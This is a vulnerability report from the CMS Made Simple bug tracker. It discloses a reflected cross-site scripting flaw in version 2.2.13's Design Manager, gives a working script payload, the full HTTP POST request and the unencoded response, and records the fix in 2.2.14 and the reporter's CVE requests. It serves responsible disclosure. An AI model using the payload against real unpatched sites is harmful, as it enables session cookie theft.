CMS MADE SIMPLE FORGE

CMS Made Simple Core

 
Back Back to List

[#12225] Reflected Cross-Site Scripting - CMS Made Simple 2.2.13

avatar
Created By: Guram Javakhishvili (guramjava)
Date Submitted: Sun Dec 22 17:37:50 -0500 2019

Assigned To:
Version: 2.2.13
CMSMS Version: 2.2.13
Severity: Minor
Resolution: Fixed
State: Closed
Summary:
Reflected Cross-Site Scripting - CMS Made Simple 2.2.13
Detailed Description:
 
# Summary:

• Title: CMS Made Simple 2.2.13 Cross Site Scripting (XSS) Reflected
• Date: 22/12/2019
• Author: Guram Javakhishvili
• Email: guramj@gmail.com, misheljava@gmail.com
• Software : CMS Made Simple 2.2.13 
• Product Version: 2.2.13
• Vulnerability Type : Injection
• Vulnerability : Cross Site Scripting (XSS) Reflected

#Description:

CMS Made Simple version 2.2.13  suffer from reflective and persistent (stored)
cross site scripting and html injection vulnerabilities.
Insufficient validation of user input on the authenticated part of the CMS Made
Simple web application exposes the application to Reflected cross site scripting
(XSS) vulnerability.
These vulnerabilities enable potentially dangerous input from the user to be
accepted by the application and then embedded back in the HTML response of the
page returned by the web server.

# Steps to Reproduce:

The attacker needs the appropriate permissions but non-Admin (can be Editor or
Designer user roles) in order to create News, Content, Directory, Shortcuts,
etc.
It was noted that the Design Manager function was found to be vulnerable to a
Reflected Cross Site Scripting (XSS) vulnerability.
Login as Designer> click on 'Layout' >  insert XSS payload into the 'Name' field
and click submit. As a result of improper error handling the XSS payload will
rendering in the browser.

List of vulnerable parameter:
	• m1_name

Attack vector:
"";<iframe/t></iframe><script>alert(document.cookie)</script><"


# HTTP POST Request:

POST /cmsms-2.2.13/admin/moduleinterface.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101
Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Content-Type: multipart/form-data;
boundary=---------------------------145783006514034
Content-Length: 1297
Origin: http://localhost
Connection: close
Cookie:
6a048a268372a94a595fdec4fbda4134aa83a6e6=39ad8f674b75bdccf8ef6290736c7ac60708435d%3A%3AeyJ1aWQiOjMsInVzZXJuYW1lIjoiZGVzaWduZXIiLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkS0FPa1NsQTdKSXR2RFRsdVBhSVRJLkhIOE4yMkJtZmYyUC5KczVFMGFGeW5nRmxVVDVmMnEifQ%3D%3D;
__c=7536d3867590a8fcc52; CMSIC1a82b0c9a5=4c765t5v2p4prm6t8v940s15nc;
CMSSESSIDa9ac5a041c5c=ibso1e87pflpck00qt050vmoqj
Upgrade-Insecure-Requests: 1

-----------------------------145783006514034
Content-Disposition: form-data; name="mact"

DesignManager,m1_,admin_edit_template,0
-----------------------------145783006514034
Content-Disposition: form-data; name="__c"

7536d3867590a8fcc52
-----------------------------145783006514034
Content-Disposition: form-data; name="m1_tpl"

15
-----------------------------145783006514034
Content-Disposition: form-data; name="m1_submit"

Submit
-----------------------------145783006514034
Content-Disposition: form-data; name="m1_name"

Breadcrumbs"";<iframe/t></iframe><script>alert(document.cookie)</script><"
-----------------------------145783006514034
Content-Disposition: form-data; name="m1_contents"

test
-----------------------------145783006514034
Content-Disposition: form-data; name="m1_description"

test
-----------------------------145783006514034
Content-Disposition: form-data; name="m1_listable"

1
-----------------------------145783006514034
Content-Disposition: form-data; name="m1_type"

5
-----------------------------145783006514034
Content-Disposition: form-data; name="m1_category_id"


-----------------------------145783006514034
Content-Disposition: form-data; name="m1_owner_id"

1
-----------------------------145783006514034--









# Snip of HTTP Server response (output not encoded):


				<!-- end sidebar //-->
				<!-- start main -->
				<div id="oe_mainarea" class="cf">
<aside class="message pageerrorcontainer" role="alert"><p>Invalid characters in
name:
Breadcrumbs"";<iframe/t></iframe><script>alert(document.cookie)</script><"</p></aside><article
role="main" class="content-inner"><header class="pageheader cf"><h1><img
src="http://localhost/cmsms-2.2.13/modules/DesignManager/images/icon.gif" alt=""
class="module-icon" />Design&nbsp;Manager</h1> <span class="helptext"><a
href="http://localhost/cmsms-2.2.13/admin/moduleinterface.php?


History

Comments
avatar 
Date: 2020-03-01 05:47
Posted By: Guram Javakhishvili (guramjava)

Hi,

Is there any update on this?
avatar 
Date: 2020-03-01 14:03
Posted By: Guram Javakhishvili (guramjava)

Could you please assign CVE to this vulnerability? Thanks.
avatar 
Date: 2020-03-08 15:17
Posted By: Guram Javakhishvili (guramjava)

Hi, Is there any update on the above and could you please assign CVE to this
vulnerability? Thanks.
avatar 
Date: 2020-03-18 11:13
Posted By: Rolf (rolf1)

fixed for 2.2.14
avatar 
Date: 2020-03-21 14:06
Posted By: Guram Javakhishvili (guramjava)

Could you please assign CVE to this vulnerability? Thanks.
avatar 
Date: 2020-03-30 13:13
Posted By: Rolf (rolf1)

CMS Made Simple 2.2.14 is released
avatar 
Date: 2020-05-03 16:01
Posted By: Guram Javakhishvili (guramjava)

Hello,

Is there any update on this? I have been asking for an update since my
submission of the above vulnerability. It is by now over five month since this
vulnerability has been reported to you by myself.
And I would like to ask you if you would let me go public by next week? 
Could you please mark this as PUBLIC?
I also wish to request a CVE number for this vulnerability if that is ok?

If you have any questions please let you know.

Regards,
Guram
Updates

Updated: 2020-03-30 13:13
state: Open => Closed

Updated: 2020-03-18 10:41
resolution_id: 5 => 7
severity_id: 2 => 3
assigned_to_id: 106 => 100

Updated: 2020-03-08 15:17
assigned_to_id: 13536 => 106

Updated: 2019-12-22 17:57
summary: CMS Made Simple 2.2.13 - Reflected Cross-Site Scripting => Reflected Cross-Site Scripting - CMS Made Simple 2.2.13
resolution_id: => 5